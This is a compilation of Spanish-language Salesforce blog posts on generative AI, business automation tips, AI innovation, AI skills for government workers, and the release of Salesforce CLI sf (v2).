El resumen de casos puede ayudar a los agentes de servicio a conocer rápidamente a los clientes y sus interacciones anteriores con su empresa. Los casos proporcionan información del cliente, como comentarios, historial de compras, problemas y resoluciones. La IA generativa puede ayudar a recomendar casos de clientes similares, por lo que un agente puede proporcionar rápidamente una variedad de soluciones. Esto da como resultado resoluciones más rápidas, ahorros de tiempo y costos, y clientes más satisfechos.

Automatización de la generación de código básico

La automatización ayuda a los desarrolladores y especialistas en integración a generar código para tareas básicas pero fundamentales. Por ejemplo, puede usar código escrito por modelos de lenguaje grande para desencadenar tareas específicas de automatización de marketing, como enviar ofertas y generar plantillas de mensajes para clientes. De esta manera, el lenguaje general es coherente, personalizado para el cliente y en la voz de su empresa. La automatización puede ahorrar tiempo y mejorar la productividad, lo que permite a los desarrolladores concentrarse en tareas que requieren más atención y personalización.

La IA brinda oportunidades ilimitadas para acercarse a sus clientes al tiempo que garantiza que está operando de manera eficiente. En un estudio reciente de más de 500 líderes de TI, descubrimos que al menos el 33 % consideró que la IA generativa era una prioridad para su negocio. Además, el 67% planeaba priorizarlo en los próximos 18 meses.

Cuando se usan como parte de una estrategia de IA híbrida , los modelos de lenguaje grandes pueden complementar varias capacidades predictivas y mejorar drásticamente la productividad. Si bien la IA generativa puede hacer mucho, esta tecnología aún necesita la guía humana para ser más efectiva para las empresas. La IA generativa puede sacar a la luz los conocimientos que necesita para tomar decisiones que puedan hacer avanzar su negocio.

Piense en ello como un asistente inteligente y automatizado para su empresa, que maneja tareas que consumen mucho tiempo para que sus empleados puedan trabajar en la resolución de problemas complejos. Cuando combine el poder de la IA generativa con el conocimiento y la experiencia que su empresa puede brindar, podrá hacer más por sus clientes.

Cómo la IA generativa ayuda al servicio y las ventas

Hace poco le preguntamos a 2000 profesionales de ventas y servicios qué pensaban sobre la IA generativa. Consulte nuestro informe para mantenerse informado.

Urvi Shah, redactora técnica del personal, contribuyó a esta publicación de blog.

Seguir leyendo

ai Análisis Automatización CI cli Cómo Conectar Conocimiento consulta Correo electrónico Costo cuenta Datos desarrollador Desarrolladores EGA Futura Emprendedor Empresa Empresas Estrategia Evento Eventos Force.com ga IA generativa Informe integración Lead Marca Marketing Mejorar la productividad Negocio Negocios Nube Oportunidad Otros Plataforma Preguntas Proceso Procesos manuales Product Productividad Producto Reseñas Respuesta Respuestas Salesforce Salesforce.com seguridad Tarea Tecnología TI UI Ventas

5 consejos para incorporar la automatización en su negocio

Seamos realistas: el trabajo mundano y repetitivo puede ser un lastre. De hecho, el 77 % de los trabajadores de escritorio dicen que la automatización de las tareas rutinarias mejoraría su productividad. Sin embargo, el 52% de las empresas todavía tienen demasiados procesos y tareas manuales. La automatización empresarial puede ser la clave para cerrar esta brecha.

La automatización empresarial conduce a clientes leales , empleados más felices, mejor eficiencia y ahorro de costos. ¿Y qué mejor manera de trazar un camino hacia la automatización empresarial que aprender de aquellos que ya lo han hecho? ¿No está seguro de por dónde empezar con la automatización? Esto ayudará .

En un informe para Salesforce , IDC entrevistó a más de 1600 líderes empresariales y de TI, en varias industrias en Asia, Europa, América del Norte y América del Sur, sobre cómo han tenido éxito con la automatización en sus empresas. A partir de esta investigación de IDC, aquí hay cinco consejos que puede usar para ayudar a incorporar la automatización en su propia práctica.

Acelere la automatización como los profesionales

Escuche a más de 1600 líderes empresariales y de TI de todo el mundo sobre las tendencias de automatización y lo que pueden hacer por su empresa.

Tabla de contenido

Sugerencia 1: Genera impulso en un área y luego expande a toda la empresa
Consejo 2: Cree un centro de automatización de excelencia
Consejo 3: automatice los flujos de trabajo de TI para ayudar a los departamentos de TI sobrecargados
Consejo 4: utilice un enfoque ágil para la automatización empresarial
Sugerencia 5: use código bajo para acelerar el tiempo de comercialización

Sugerencia 1: Genera impulso en un área y luego expande a toda la empresa

Los mejores procesos candidatos tienen pasos repetitivos, un alto volumen de tareas y datos de múltiples sistemas. Elegir un proceso maduro que haya sido probado y ajustado con el tiempo es su mejor apuesta. Si un proceso cambia con frecuencia o implica un análisis cualitativo, probablemente no sea un buen candidato para la automatización. Estos son los pasos para ayudarlo a comenzar.

1. Investiga

Para empezar, deberá determinar:

Qué proceso quieres transformar
Cuánto se tarda
Personas y departamentos involucrados
Sistemas y datos que posibilitan el proceso

2. Cuantificar los costos

Sume los costos del proceso que desea automatizar en todos los departamentos involucrados o afectados. Algunas cosas para pensar en este paso:

¿Cuánto más le cuestan las ineficiencias en tiempo extra del personal?
¿Está pagando por envíos acelerados?
¿Está contabilizando las horas extra de los contratistas?
¿Existen costes negativos en la experiencia del cliente?

3. Definir el estado deseado

Para definir su estado deseado, deberá ingresar a los detalles de su proceso automatizado. Aquí hay algunas preguntas para hacer:

¿Cómo será su nuevo proceso?
¿Quién debería estar involucrado?
¿Cuánto tiempo debe tomar el proceso automatizado?

Recuerde incorporar los comentarios de los clientes en este paso.

4. Elige las herramientas adecuadas

Al elegir herramientas de automatización empresarial, es importante seleccionar proveedores con una reputación estelar en procesos comerciales y automatización de flujos de trabajo, que también pueden actuar como sus asesores comerciales de confianza. Algunas preguntas para empezar a rodar:

¿Qué dicen los clientes (o clientes descontentos) sobre las herramientas?
¿Tiene las características que su equipo necesita para tener éxito?
¿Ofrece incorporación y atención al cliente durante toda la vida útil del servicio?

SUGERENCIA PROFESIONAL: asegúrese de que la herramienta integre sus datos existentes y automatice los procesos con clics en lugar de una codificación extensa.

5. Probar, implementar, evaluar

Ahora que ha seleccionado una herramienta y automatizado su proceso, está listo para comenzar. Por supuesto, deberá probar su nuevo proceso antes de implementarlo. Así es como descubrirá si necesita refinarlo o modificarlo.

Finalmente, haga un balance de las mejoras en las medidas clave. Considere estas preguntas:

¿Cuánto tardan los usuarios en completar los flujos de trabajo automatizados?
¿La experiencia del usuario o del cliente está a la altura de sus expectativas?
¿Sigue siendo el costo un problema?

Consejo 2: Cree un centro de automatización de excelencia

Un centro de excelencia de automatización (COE) puede marcar la diferencia en su viaje hacia la transformación digital . El objetivo del COE es supervisar el desarrollo y el lanzamiento de sus esfuerzos de automatización . Invite a personas clave de TI y del negocio para ayudar a tomar las mejores decisiones para el futuro.

Así es como puede configurar su COE de automatización para el éxito:

Elige el equipo adecuado. Seleccione a las partes interesadas que adopten el cambio y estén listas para defender las mejoras del proceso. Asegúrese de incluir un director de proyecto y al menos un patrocinador ejecutivo.
Desarrollar un marco de automatización. Para optimizar su inversión en automatización, el COE debe establecer un marco para personas, procesos, sistemas e infraestructura.
Defina una hoja de ruta de automatización. La automatización empresarial no es un evento singular. Cree una hoja de ruta de automatización, un plan de alto nivel que describa los pasos necesarios para implementar pruebas automatizadas, y obtenga la aprobación de las partes interesadas clave.
Ejecutar flujos de trabajo de automatización . Esta es la parte táctica del trabajo del COE. Identifique los puntos débiles, priorícelos y supervise la automatización de procesos.
Mide el éxito. Establezca indicadores clave de rendimiento (KPI) para medir el impacto en la experiencia de los empleados y los clientes, la eficiencia operativa y la rentabilidad.

Consejo 3: automatice los flujos de trabajo de TI para ayudar a los departamentos de TI sobrecargados

Aunque los recursos de TI de calidad son difíciles de encontrar, la acumulación de proyectos sigue aumentando. Recientemente descubrimos que a los departamentos de TI se les pide que entreguen un 41 % más en 2023 que en 2022.

La automatización de procesos de TI repetitivos alivia al personal de TI sobrecargado de trabajo y lo libera para expandir sus esfuerzos en toda la empresa.

Aquí hay algunos procesos con los que la automatización empresarial puede ayudar, para diferentes equipos:

Operaciones de TI : monitoreo de sistemas, seguridad de red, implementación de infraestructura
Servicios de TI : soporte al usuario final, aprovisionamiento de software, soporte de software
Gestión de activos : aprovisionamiento de activos, desmantelamiento, auditoría, informes
Gestión de datos : copia de seguridad y redundancia de datos, limpieza de datos

¿Quién debe participar de TI? Esto es lo que dijeron los responsables de la toma de decisiones sobre automatización:

72% dijo que los desarrolladores de TI
65% dijo operaciones de TI
49% dijo administradores de aplicaciones
42% dijo integradores de sistemas

Consejo 4: utilice un enfoque ágil para la automatización empresarial

El enfoque tradicional de “cascada”, en el que el análisis, la especificación, el diseño y las pruebas se realizan de forma secuencial, no funciona bien para la automatización empresarial. Con el enfoque en cascada, es posible que se encuentre cerca de la implementación cuando surja un problema grave, como un diseño que no se puede escalar.

La metodología ágil enfatiza el trabajo en equipo multifuncional y las pruebas continuas. Y aunque la mayoría de los desarrolladores de software la usan, la metodología ágil no es solo para desarrolladores. Su ciclo continuo de planificación, ejecución, evaluación y mejora se puede aplicar a la automatización de procesos comerciales. Una de sus mayores ventajas es que reúne equipos multifuncionales que planifican, prueban, implementan y rediseñan procesos automatizados en ciclos de liberación rápida.

Código bajo, mucho tiempo de comercialización

Elija una plataforma de código bajo que funcione para usted. Nuestra guía lo desglosa todo y describe claramente lo que necesita para comenzar a innovar hoy.

Sugerencia 5: use código bajo para acelerar el tiempo de comercialización

¿A quién no le gusta una integración empresarial y de TI más estrecha? Sin embargo, solo el 56 % de las organizaciones utilizan soluciones de código bajo , un enfoque de desarrollo que requiere poca o ninguna codificación para crear aplicaciones y procesos, para potenciar la automatización.

El desarrollo de software tradicional es largo y costoso. Con una plataforma de desarrollo de aplicaciones de bajo código ( LCAP ), los usuarios empresariales y de TI pueden desarrollar aplicaciones y flujos de trabajo automatizados a través de una interfaz gráfica de usuario ( GUI ) amigable. Esto puede marcar la diferencia cuando el personal de TI está sujeto a presiones o restricciones.

Hay una razón más para optar por el código bajo. Los esfuerzos de automatización empresarial abarcan negocios y TI. Usando código bajo, los usuarios comerciales pueden trabajar en estrecha colaboración con TI para desarrollar modelos de datos y lógica de procesos con solo hacer clic.

Primeros pasos con la automatización empresarial

La automatización empresarial no tiene por qué ser complicada. Con los consejos que ha aprendido, puede comenzar a implementar flujos de trabajo de automatización hoy mismo . Al desarrollar un área, crear un COE, automatizar para sus equipos de TI y usar un enfoque ágil y código bajo, tiene un comienzo saludable para un proceso de automatización empresarial exitoso. Ahora ve a automatizar.

Seguir leyendo

admin administrador Administradores Ágil Análisis Aplicaciones Atención al cliente Automatización Automatización de procesos Automatización de procesos comerciales CI cli código bajo cola comienzo Cómo confianza Costo Datos desarrollador Desarrolladores Desarrollo desarrollo de aplicaciones Eficiencia EGA Futura Empresa Empresas ERP Estrategia Evento flujo Flujos Force.com ga Gestión de datos Herramientas Implementar flujo INCLUIR INCLUYE Informe Informes integración Investigación Lead Líder Marca Negocio Negocios Plataforma Preguntas Proceso Proceso automatizado Product Productividad Prueba pruebas Quip redis Rendimiento REST Salesforce Salesforce.com seguridad Soporte Tarea Tema Temas TI transformación digital UI Versión

La innovación en IA llegó para quedarse: cómo mantenerse al día

Algunos de ustedes pueden ser escépticos sobre la exageración que rodea a la IA, descartándola como otra palabra de moda usada en exceso. Pero dentro de la industria tecnológica, creemos que esta revolución tecnológica tendrá un profundo impacto en la vida de las personas. Lo que distingue a esta ola de cambio es su naturaleza continua y en constante evolución.

Si bien la IA ha estado presente durante años, ahora está alcanzando nuevas alturas. El aprendizaje profundo y la capacidad de la IA para imitar las capacidades humanas están impulsando la innovación de la IA. Estos avances han transformado lo que antes se consideraba imposible en una realidad tangible. Para mantenerse al día con estos desarrollos, es crucial considerar las siguientes estrategias.

Impulse la transformación continua con la Oficina de
Innovación continua

Los servicios profesionales de Salesforce pueden ayudarlo a elevar sus capacidades para obtener el máximo valor de su inversión en Salesforce.

Abraza lo nuevo

El Foro Económico Mundial informa que casi una cuarta parte de todos los trabajos sufrirán cambios significativos en los próximos cinco años. Esta estadística asombrosa destaca la necesidad urgente de mejorar las habilidades, ya que el 44% de las habilidades dentro de esos trabajos deberán adaptarse. El crecimiento exponencial de las posibilidades debido a la innovación de la IA es evidente cada día que pasa.

Para prosperar en esta nueva era, los líderes en el acelerado entorno empresarial actual deben enfrentarse a una complejidad y turbulencia sin precedentes. La velocidad del cambio ha superado nuestra capacidad individual para mantenernos al día. Adoptar nuevas tecnologías como la IA es esencial para el éxito y mantenerse a la vanguardia. En lugar de buscar la estabilidad, debemos adoptar lo contrario y aprovechar el poder de los datos, la IA y los circuitos de retroalimentación en tiempo real para mejorar nuestra toma de decisiones estratégicas.

Ahora, exploremos pasos prácticos para adoptar esta nueva realidad:

Potencie la creatividad con IA generativa : use su capacidad para producir ideas, diseños y contenido innovadores. Puede aprovechar grandes cantidades de datos y generar soluciones creativas que antes eran inimaginables. Al hacerlo, podrá mantenerse a la vanguardia en un mercado de innovación de IA que evoluciona rápidamente. También podrá explorar trabajos más imaginativos y de valor agregado al automatizar tareas repetitivas y liberar tiempo.
Reconsidere su papel en la era de la innovación de la IA : la mayoría de los trabajadores del conocimiento no podrán hacer su trabajo sin el apoyo de la IA. Necesitarán aprender estas habilidades en muy poco tiempo. La IA exigirá que reconsideremos nuestro papel en la autoría, la ideación y la resolución de problemas.
Espere revoluciones tecnológicas frecuentes : el tiempo se acorta entre transformaciones importantes. Hace cientos de años, se necesitaron cambios importantes en la tecnología, como el causado por la imprenta, en el transcurso de varias generaciones. Con el paso del tiempo, el ritmo del cambio se aceleró. Tomemos, por ejemplo, los cambios provocados por la invención del automóvil, que se produjeron entre generaciones. Ahora, podemos ver que las revoluciones en tecnología, como Internet, pueden ocurrir dentro de una sola generación.

La IA se está moviendo rápido y continuará creando cambios constantes. Para adaptarnos, necesitamos sentirnos cómodos con la inestabilidad porque el polvo nunca se asentará . Si se encuentra sin planes para ajustar su forma de trabajar, inicie la conversación ahora.

Volverse más receptivo al cambio

Reconocer y solidarizarse con los desafíos de la transformación . Considere los siguientes enfoques prácticos para apoyar a su organización a través del cambio:

Cree seguridad para que las personas exploren posibilidades : este es el ancla del enfoque de cambio centrado en el ser humano de Salesforce. Al igual que el ancla de un barco, permitirá deambular en todas las direcciones mientras se mantiene en una ubicación estratégica.
Defina lo que se mantendrá firme : cuando todo parece estar cambiando rápidamente, identifique las cosas importantes que NO están cambiando. Esto los aislará del mar de novedades que rodean a sus equipos.
Encuentre pequeños pasos para preparar a su gente : Algo tan simple como mantener sus Etapas de ventas actuales mientras aplica EinsteinGPT puede brindarle una base segura mientras prueba cosas nuevas.
Invierta en capacitación y capacitación : reconozca que la innovación de la IA afectará los roles laborales y las habilidades requeridas. Proporcione programas de capacitación y recursos para que sus empleados aprendan a trabajar de manera efectiva con las tecnologías de IA. Al hacerlo, fomentará una cultura de aprendizaje continuo y desarrollo de habilidades.

Recuerde, demasiados cambios a la vez pueden generar resistencia. Al administrar y enmarcar sus iniciativas de cambio de manera reflexiva, puede ayudar a su organización a desarrollar una mentalidad abierta. Cuando eso suceda, los empleados se sentirán más seguros para explorar nuevas ideas. Esto permite una cultura de adaptabilidad y crecimiento.

empezar con
Entrenador de IA

Los servicios profesionales de Salesforce pueden ayudarlo a establecer la base adecuada para el éxito con nuestro nuevo paquete, AI Coach.

Construye pistas para el futuro

El éxito llegará a las organizaciones que crean un espacio para explorar el cambio y probar los impactos potenciales de la innovación de la IA. Siga estos pasos para construir su futuro de IA:

Forme un equipo de innovación multifuncional : reúna un equipo de personas con experiencia diversa en comportamiento, adopción y transformación. Este equipo impulsará la exploración, implementación y prueba de soluciones de IA dentro de su organización.
Diseñar una infraestructura para el futuro : no se pueden poner trenes magnéticos de alta velocidad en las vías del tren tradicional. Los líderes deberán examinar sus plataformas, infraestructura, deuda técnica y gobernanza para asegurarse de que estén listos.
Adopte una mentalidad centrada en el cliente : comprenda cómo la IA puede mejorar las experiencias de los clientes y mejorar su conexión con ellos. Desarrolle una estrategia que use IA para proporcionar una entrega de productos más rápida, servicios personalizados, mayor reconocimiento de marca y mayor participación del cliente.
Genere confianza : Esta tecnología tiene tantos peligros como beneficios. Adopte un enfoque centrado en el ser humano y genere confianza con aquellos que usan sus productos. Tus clientes toman sus decisiones de compra en base a la confianza que creas. El uso responsable y ético estará en el centro mismo de este esfuerzo.

El futuro de la IA tiene un potencial inmenso. Al abordarlo de manera cuidadosa y responsable, puede desbloquear nuevas posibilidades e impulsar a su organización hacia el éxito a largo plazo.

Impulse la innovación continua de la IA

La revolución de la IA está aquí. Para prosperar en esta era, las organizaciones deben adoptar la IA y su poder transformador. Salesforce Professional Services es su socio de confianza en este viaje. Lo ayudaremos a navegar por el panorama en evolución de la IA e impulsar la transformación continua.

Con la Oficina de Innovación Continua , nuestro equipo de asesores de confianza trabajará con usted para optimizar y escalar para el futuro, aumentar la agilidad y la flexibilidad y mejorar la entrega de la plataforma. Lo ayudaremos a alinearse con los resultados comerciales y darse cuenta del poder de la IA y los datos, todo en la plataforma de CRM de IA n.º 1 del mundo. Juntos, podemos potenciar las experiencias de sus clientes y desbloquear todo el potencial de Salesforce.

No dejes que el polvo se asiente. Aproveche las extraordinarias posibilidades de la IA con los servicios profesionales de Salesforce e impulse a su organización a nuevos niveles de innovación y éxito.

Seguir leyendo

admin ai AMA Business CI cli Cómo conexión Conocimiento Crecimiento CRM cuenta Data Datos Desarrollo Deuda EGA Futura Einstein Empresa Estrategia Force.com ga IA generativa Lead LEx Marca Móvil Novedades PCI Plataforma Product Producto productos Prueba Quip Salesforce Salesforce.com seguridad Tarea Tech Technology Tecnología TI UI Ventas Versión

Lo que los gobiernos necesitan ahora: datos y habilidades de IA

El auge de la IA está aquí , lo que significa que es hora de ver cómo la IA en el gobierno puede hacer que las cosas funcionen mejor tanto para las organizaciones como para los electores.

Para las organizaciones gubernamentales y del sector público, hay formas claras en que la IA puede ayudarlos a ser más eficientes y servir a las personas de mejores maneras, como el procesamiento de datos, la seguridad cibernética y la planificación pública, por nombrar algunas.

Las agencias públicas tienen la oportunidad de crear conciencia sobre la importancia de la IA en el gobierno. Este auge de la IA significa que es un buen momento para que los trabajadores del gobierno adquieran nuevas habilidades y aseguren su futuro. Obtener estas habilidades de IA en demanda ayudará a los empleados a servir mejor al público, mejorando la confianza entre los sectores público y privado.

Concéntrese en su misión, no en TI

Aprenda de un ex ejecutivo del gobierno federal cómo una mayor seguridad cibernética puede ayudar a hacer posible la transformación digital para el sector público.

Sin embargo, una de las mayores preocupaciones en torno al surgimiento de esta tecnología y las inversiones que se están realizando en ella es una crisis de habilidades de IA. Una encuesta de SAS de los tomadores de decisiones de las principales empresas estadounidenses que abarcan nueve sectores, incluido el gobierno, dice que el 63% de los encuestados cree que no tienen suficientes recursos de inteligencia artificial y aprendizaje automático de alta calidad.

Esa brecha de habilidades, junto con el enfoque de avance a toda velocidad por parte de los tomadores de decisiones en las empresas y el gobierno, está dando a los trabajadores motivos para preocuparse.

En marzo, el banco de inversión Goldman Sachs predijo que la IA eventualmente podría reemplazar 300 millones de empleos de tiempo completo en todo el mundo y afectar a casi una quinta parte del empleo, con un impacto particular en los trabajos administrativos que a menudo se consideran a prueba de automatización, como las profesiones administrativas y legales. .

Pero se crearán empleos: la pregunta es en qué porcentaje se desplazarán esos empleos compensados. El Informe sobre el futuro de los empleos del Foro Económico Mundial dice que casi el 75 % de las empresas encuestadas esperan adoptar la IA; el 50 % de las organizaciones cree que dará como resultado un crecimiento del empleo y el 25 % cree que creará pérdidas de empleo.

Por eso es tan importante, a medida que la IA asume una cantidad cada vez mayor de tareas de nivel inferior, que los trabajadores afectados por este cambio adquieran las habilidades para pasar a un trabajo más emprendedor. Existe una gran oportunidad para que su organización adopte la IA en el gobierno, pero primero, debe asegurarse de que sus empleados tengan la capacitación adecuada y que tenga los datos fundamentales seguros con los que trabajará la IA.

La modernización de datos es el primer paso para configurar su organización para un futuro optimizado por IA. También es un área en la que los trabajadores pueden mejorar y hacer la transición a medida que la IA aleja el flujo de trabajo basado en humanos de las tareas de nivel inferior.

Cómo la brecha de habilidades crea una oportunidad para la IA en trabajos gubernamentales

AI tiene el poder de mejorar enormemente las operaciones gubernamentales para satisfacer de manera más efectiva las necesidades de sus ciudadanos. Los casos de uso son prácticamente infinitos , desde la gestión del tráfico hasta la prestación de atención médica y el procesamiento de interminables formularios y papeleo que obstruyen notoriamente a casi todas las agencias gubernamentales.

Los departamentos de salud están utilizando IA en todo, desde acelerar los ensayos de medicamentos hasta detectar y prevenir la próxima pandemia .

Las agencias de seguridad pública están implementando IA para apoyar al personal, optimizar las operaciones y analizar grandes conjuntos de datos.

La lista continúa: identificar las deficiencias de infraestructura y las soluciones más efectivas y eficientes; formas más efectivas de implementar redes de seguridad y al mismo tiempo detectar el fraude; opciones de autoservicio para consultas de residentes; simplificar los sistemas judiciales atrasados .

La amplia gama de IA en aplicaciones gubernamentales crea una necesidad gigantesca de trabajadores preparados para la tecnología digital. Pero uno de los mayores obstáculos que se interponen en el camino de las agencias públicas para adoptar completamente y adoptar rápidamente esta tecnología es la falta de inteligencia artificial y capacidades de gestión de datos dentro de su propia fuerza laboral.

Los trabajadores del gobierno a menudo carecen de las habilidades de inteligencia artificial y ciencia de datos necesarias para manejar la escala masiva de datos de los ciudadanos y construir modelos de inteligencia artificial de última generación que, en última instancia, beneficiarán al público.

¿Cómo nos aseguramos de manera efectiva de que los trabajadores no se pierdan o, peor aún, se queden atrás con tanto cambio a nuestro alrededor tan rápidamente? ¿Y cómo dotamos a los trabajadores de las herramientas adecuadas que garanticen la equidad, la accesibilidad y la seguridad? Esto es especialmente importante para las organizaciones del sector público que tienen la responsabilidad adicional de mantener algunos de los estándares de seguridad más estrictos del mundo.

La educación y capacitación adecuadas sobre el uso responsable de la IA es el siguiente paso para las organizaciones , ayudando al sector público a servir mejor a su gente.

Los programas de educación para la IA en el gobierno están teniendo éxito en todo el mundo

Ahora que conoce la importancia de la educación en IA, es hora de ver cómo otras organizaciones de todo el mundo están manejando esta oportunidad.

Finlandia lanzó Elementos de IA en 2018 , cursos en línea gratuitos diseñados para presentar los conceptos básicos de IA a personas no especializadas en el público. Los cursos incluyen recursos de autoaprendizaje, contenido interactivo y trabajo basado en tareas que enseña conceptos, métodos de uso y limitaciones de la tecnología. El gobierno finlandés se comprometió a educar al menos al 1 por ciento de su población, un objetivo que se cumplió y superó rápidamente. Los cursos ahora están disponibles en más de 20 idiomas y 1 millón de personas en todo el mundo lo han completado.

De manera similar, AI Singapur lanzó el programa AI for Everyone , una iniciativa nacional administrada por el gobierno para equipar a las personas y organizaciones con las habilidades para usar la IA y el aprendizaje automático para el bien social. Ofrece cursos y talleres de IA, y financiación y apoyo para proyectos de IA que abordan el cambio social.

En los EE. UU., la legislación que crearía un programa de capacitación en IA para supervisores federales y funcionarios administrativos también está en proceso de aprobación en el Congreso . Su objetivo es proporcionar orientación sobre el uso de IA a los líderes federales. Esto les ayuda a garantizar que los riesgos y las recompensas del uso de la tecnología se sopesen adecuadamente frente a las misiones de la agencia y las comunidades a las que sirven.

Equipar a una fuerza laboral con habilidades de IA puede ayudar a generar confianza en el gobierno

Los empleados que poseen las habilidades adecuadas para el momento son invaluables para un gobierno que funcione. La experiencia del empleado está directamente relacionada con la experiencia del cliente, ya que descubrimos que solo el 18 % de las personas encuestadas cree que la experiencia del cliente tiene prioridad en sus interacciones con el gobierno.

Mientras tanto, también descubrimos que el 73 % de la fuerza laboral no se siente “muy equipada” con los recursos necesarios para aprender las habilidades digitales requeridas para tener éxito ahora. Sin embargo, está claro que equipar a los trabajadores del sector público con las habilidades necesarias para aprovechar la IA los empodera para brindar experiencias transformadoras al público.

Lo que significa que existe una gran oportunidad de mejorar las habilidades de los trabajadores del sector público para aprovechar las oportunidades que presenta la IA en el gobierno. Esto no solo significa seguridad para los trabajadores en un momento inquietante, sino también mejores experiencias para la población a la que sirven. En última instancia, esta es una oportunidad para generar más confianza , asegurando que el sector público esté haciendo todo lo posible para servir mejor a la población.

Los datos son la base de una IA confiable

Una de las principales formas en que puede preparar a sus empleados para la IA es mediante la modernización y unificación de sus datos. Es importante tener en cuenta que las herramientas de IA son tan efectivas como los datos de los que extraen y las personas que guían la tecnología.

Cuando sus datos están conectados y unificados, puede desbloquear el verdadero potencial de la IA y la automatización, impulsado por conocimientos en tiempo real. Esto lo ayudará a crear experiencias que no solo promuevan la misión de su organización, sino que generen confianza con las personas a las que sirve.

El ascenso del Director de Datos es un indicador de la importancia de esta función y los conjuntos de habilidades especializadas que diferenciarán a las organizaciones exitosas. Estos roles no solo requieren la gestión de datos, sino también las tareas críticas de garantizar el uso ético y equitativo de las tecnologías basadas en datos.

La confianza es una parte integral de la IA en el gobierno, lo que significa que la integridad y la seguridad de los datos son fundamentales. Eso crea una oportunidad para que las organizaciones del sector público establezcan componentes fundamentales (análisis y estandarización de grandes conjuntos de datos, implementación de medidas de seguridad mejoradas y modelado de datos innovador) para configurarlos para un futuro centrado en la IA.

El futuro de los servicios digitales

Obtenga información de miles de personas sobre las tendencias globales que afectan las interacciones con los clientes y el gobierno y el enfoque del sector público hacia la transformación digital.

Seguir leyendo

accesibilidad admin ai AMA Análisis Aplicaciones Automatización CI cli Cómo Comunidad Comunidades confianza Conocimiento consulta Crecimiento cuenta Datos Eficiencia EGA Futura el flujo Emprendedor Empresa Empresas Encuesta ERP flujo Force.com ga Gestión de datos Herramientas INCLUYE Informe inteligencia inteligencia artificial IU la oportunidad Lead Líder Negocios Oportunidad PCI Proceso proceso de aprobación Prueba Quip REST Salesforce Salesforce.com seguridad Tarea Tecnología Tema Temas TI transformación digital UI Versión Versiones

¡Ya está aquí la CLI sf (v2) de Salesforce! — Parte 1 ☁️

El enlace a la publicación original, lo encontrarás al final de este artículo.

…

¡Ya está aquí la CLI sf (v2) de Salesforce! — Parte 1 | Blog de desarrolladores de Salesforce

La CLI de Salesforce es una de las herramientas de desarrollo más importantes de nuestro ecosistema. La CLI es el compañero diario de los desarrolladores de Salesforce para crear, probar, implementar y más. Además, la CLI es fundamental para las prácticas de DevOps, como la integración continua, donde la automatización es clave. Después de siete años de disponibilidad general, ahora estamos entrando en un nuevo capítulo para la CLI de Salesforce.

Esta publicación es la primera de una serie de blogs de dos partes sobre sf (v2), la nueva y mejorada CLI de Salesforce. En la Parte 1, veremos las novedades de Salesforce CLI sf (v2). Luego, en la segunda parte de la serie, nos sumergiremos en cómo puede migrar de comandos y banderas de estilo sfdx a los nuevos comandos y patrones de bandera de estilo sf .

Anuncio de disponibilidad general (GA) de `sf` (v2)

Hace aproximadamente dos años, el equipo de CLI de Salesforce se embarcó en una iniciativa de unificación con la visión de unificar las diversas experiencias de CLI en todo el ecosistema de Salesforce. Anunciamos la próxima evolución de nuestra CLI de Salesforce con un nuevo ejecutable llamado sf . La creación de sf como una CLI separada nos dio la oportunidad de diseñar, probar y lanzar no solo una nueva estructura de comando para un rápido desarrollo entre nubes, sino también una CLI más intuitiva, eficaz y fácil de usar.

Hoy, nos complace anunciar la disponibilidad general (GA) de la segunda versión (v2) de sf . Esta es una versión principal de sf CLI que es lo suficientemente inteligente como para comprender todos sus comandos sfdx , así como los comandos sf , con tiempos de instalación y actualización mucho más rápidos. La CLI sf (v2) es todo lo que es sf y sfdx . Después de instalar sf (v2), tendrá acceso a todos los comandos sfdx y sf , y podrá continuar ejecutando cualquiera de ellos.

Adopte el futuro del desarrollo de Salesforce

La CLI sf (v2) es nuestro camino a seguir. Le permite experimentar actualizaciones e instalaciones más rápidas ya que el tamaño de instalación/descarga se ha reducido considerablemente.

Esto significa que todas las capacidades nuevas vendrán solo a través de sf (v2) y dejaremos de publicar actualizaciones en sfdx (excepto las correcciones relacionadas con la seguridad). Además, todas las nuevas correcciones y características del complemento CLI solo entrarán en sf (v2).

Después de una importante investigación de UX, hemos introducido nuevos comandos de estilo sf y patrones de bandera para brindar una mejor experiencia de usuario. Sin embargo, si le preocupan los esfuerzos necesarios para migrar de sfdx a sf , ¡tenemos buenas noticias para usted! Todavía puede usar los comandos sfdx y la CLI sf seguirá respondiendo de la misma manera. Además, solo tendrá un conjunto de complementos CLI en lugar de uno para sfdx y otro para sf (v1). (Nota: si ha instalado complementos, todos los complementos en sf estarán disponibles en sf (v2). Sin embargo, los complementos en sfdx no están disponibles automáticamente en sf (v2). Instale los que necesita usando sf plugins install ) .

Comience con la CLI de Salesforce `sf` (v2)

Para familiarizarse con sf (v2), siga las instrucciones de instalación , que le mostrarán cómo pasar a sf (v2) y cómo volver a su instalación CLI actual si es necesario.

Nota sobre la instalación de Salesforce CLI `sf` (v2):

Creamos un alias para sfdx dentro de sf (v2), para que no necesite actualizar sus scripts de sfdx a sf . Dado que sf (v2) utilizará el alias sfdx, deberá desinstalar sfdx para que ese nombre esté disponible para sf (v2)

La CLI sf (v2) no se puede instalar en una máquina que tenga sfdx instalado. Según las instrucciones de instalación de sf (v2), primero debe desinstalar sfdx . Si no desinstala primero sfdx y, en su lugar, intenta instalar sf a través del paquete npm @salesforce/cli , que ahora alberga sf (v2), la instalación fallará. Tenga en cuenta que su CI no debe instalar sfdx , solo sf(v2) .

¿Que sigue?

Estén atentos para obtener más información sobre cómo pasar de los comandos sfdx -style a los comandos sf -style en la parte final de esta serie de blogs.

Mientras explora sf (v2), recuerde informar cualquier error, solicitud de función o comportamiento sorprendente a través del repositorio CLI GitHub . ¡Estamos emocionados de saber de usted y, como siempre, le agradecemos su apoyo!

Recursos

Sobre los autores

Pooja Reddivari es gerente sénior de gestión de productos en la organización Herramientas y experiencia para desarrolladores de plataformas en Salesforce. Le apasiona crear productos escalables y resistentes que deleiten a desarrolladores y clientes. Pooja ha trabajado en las verticales de empresa, educación y fintech con más de 12 años de experiencia como profesional de ingeniería y gestión de productos. Sígala en Twitter @poojasalesforc1 y en LinkedIn .

Philippe Ozil es un defensor principal de desarrolladores en Salesforce, donde se enfoca en la plataforma de Salesforce. Escribe contenido técnico y habla con frecuencia en conferencias. Es un desarrollador full-stack y disfruta trabajar en proyectos DevOps, robótica y VR. Sígalo en Twitter @PhilippeOzil o consulte sus proyectos de GitHub @pozil .

Obtenga las últimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a través de Slack o RSS.

Agregar a Slack Suscríbete a RSS

Seguir leyendo

